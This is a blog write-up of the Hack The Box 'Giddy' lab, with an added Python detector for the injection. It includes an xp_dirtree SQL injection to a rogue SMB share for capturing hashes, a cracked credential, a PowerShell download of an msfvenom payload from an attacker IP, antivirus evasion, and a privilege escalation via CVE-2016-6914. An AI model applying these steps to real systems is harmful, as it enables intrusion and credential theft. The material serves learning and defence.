Hacker lair Welcome to my blog where I write about Threat Hunting, Pentesting and Cybersecurity in general.

HTB Giddy Windows

Tools and techniques used: PowerShell, Phantom-Evasion, Burp Suite

Recon

Nmap scan

PORT     STATE SERVICE       VERSION
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
443/tcp  open  ssl/http      Microsoft IIS httpd 10.0
|_http-server-header: Microsoft-IIS/10.0
3389/tcp open  ms-wbt-server Microsoft Terminal Services
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Gobuster

Under the remote directory we locate a Windows Server 2016 access page.

In the mvc directory we locate a running web app.

Exploitation Method 1: SQL Injection and Burp Suite

After a little trial and error we find that the web app is vulnerable to SQL injection:

caps--

We start Burp Suite and make the following search request to the server: “cap--”

We capture the request with Burp Suite and modify it to:

' EXEC master.sys.xp_dirtree '\\10.10.14.34\share'--

Then we forward the request. We run Responder with the -I tun0 option to set up an SMB server that captures the NetNTLM hash.

Finally we use John to crack the hash:

Stacy : xNnWo6272k7x 

We use the obtained credentials to log in to the remote directory.
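As an added defender-side example (not part of the original writeup), the following Python scans IIS W3C log lines for the xp_dirtree UNC-path injection used in Method 1 (and again by the Method 2 module): a request whose decoded query string calls a path-taking extended stored procedure with a \\host\share argument. The log excerpt, the /mvc/Search.aspx page, the SearchTerm parameter and the 192.0.2.10 server address are constructed assumptions; only the attacker address 10.10.14.34 comes from the writeup.

```python
import re
from urllib.parse import unquote_plus

# Constructed IIS W3C log excerpt (sample data, not taken from the original
# post). The hypothetical /mvc/Search.aspx page and SearchTerm parameter stand
# in for the search form described above; the second request carries the
# xp_dirtree UNC-path injection, URL-encoded as IIS records it.
SAMPLE_IIS_LOG = """\
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query c-ip sc-status
2018-09-01 10:00:01 192.0.2.10 GET /mvc/Search.aspx SearchTerm=caps 10.10.14.34 200
2018-09-01 10:00:07 192.0.2.10 GET /mvc/Search.aspx SearchTerm=%27+EXEC+master.sys.xp_dirtree+%27%5C%5C10.10.14.34%5Cshare%27-- 10.10.14.34 500
2018-09-01 10:00:09 192.0.2.10 GET /mvc/Product.aspx ProductId=17 10.10.14.50 200
"""

# Extended stored procedures that take a path and make SQL Server authenticate
# to a remote SMB share when handed a UNC path (xp_dirtree is the one used above).
EXTENDED_PROCS = re.compile(r"\bxp_(?:dirtree|fileexist|subdirs)\b", re.IGNORECASE)
# \\host\share as it appears after URL decoding.
UNC_PATH = re.compile(r"\\\\(?P<host>[\w.-]+)\\[\w$.-]+")


def find_ntlm_coercion(log_text):
    """Scan IIS W3C lines and return one finding per request whose decoded
    query string calls a path-taking extended procedure. Each finding records
    the client IP, the procedure, and the UNC host the server would contact."""
    fields, findings = None, []
    for raw in log_text.splitlines():
        if raw.startswith("#Fields:"):
            fields = raw.split()[1:]      # field order comes from the header
            continue
        if raw.startswith("#") or not raw.strip() or fields is None:
            continue
        record = dict(zip(fields, raw.split()))
        query = unquote_plus(record.get("cs-uri-query", "-"))
        proc = EXTENDED_PROCS.search(query)
        if not proc:
            continue
        unc = UNC_PATH.search(query)
        findings.append({
            "client": record.get("c-ip"),
            "uri": record.get("cs-uri-stem"),
            "proc": proc.group(0).lower(),
            "unc_host": unc.group("host") if unc else None,
            "query": query,
        })
    return findings


if __name__ == "__main__":
    for f in find_ntlm_coercion(SAMPLE_IIS_LOG):
        print(f"{f['client']} -> {f['uri']} called {f['proc']} against \\\\{f['unc_host']}")
```

A hit paired with an outbound SMB (TCP 445) connection from the SQL Server host to the reported UNC host confirms the coercion; blocking that egress keeps the NetNTLM hash from leaving the network even if the injection succeeds.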

Privilege Escalation: Ubiquiti UniFi Video and Phantom-Evasion

We find a program called Ubiquiti UniFi Video installed. This program is vulnerable to the local privilege escalation CVE-2016-6914.

We create an msfvenom shell and upload it to the target machine:

powershell wget "http://10.10.14.14/taskkill.exe" -outfile "taskkill.exe" 

However, antivirus detects our malicious shell and blocks its execution. To overcome this, we download and install Phantom-Evasion:

https://github.com/oddcod3/Phantom-Evasion

We create an x64 msfvenom payload, “taskkill.exe”, and upload it to the target machine:

powershell wget "http://10.10.14.14/taskkill.exe" -outfile "taskkill.exe" 

We proceed to set up multi/handler to catch our shell.

We type Stop-Service “Ubiquiti Unifi Video” to shut down the program. Then we use Start-Service “Ubiquiti Unifi Video” to restart it.

Finally we obtain an “NT AUTHORITY\SYSTEM” shell.

Exploitation Method 2: Metasploit (MSF)

Microsoft SQL Server SQLi NTLM Stealer

use auxiliary/admin/mssql/mssql_ntlm_stealer_sqli

SMB capture module

use auxiliary/server/capture/smb

Use John to crack the captured hashes in the netntlmv2 format:

Stacy : xNnWo6272k7x 

Flags

Root: CF559C6C121F683BF3E56891E80641B1
User: 10C1C275385280605E96ADD808C1A0AD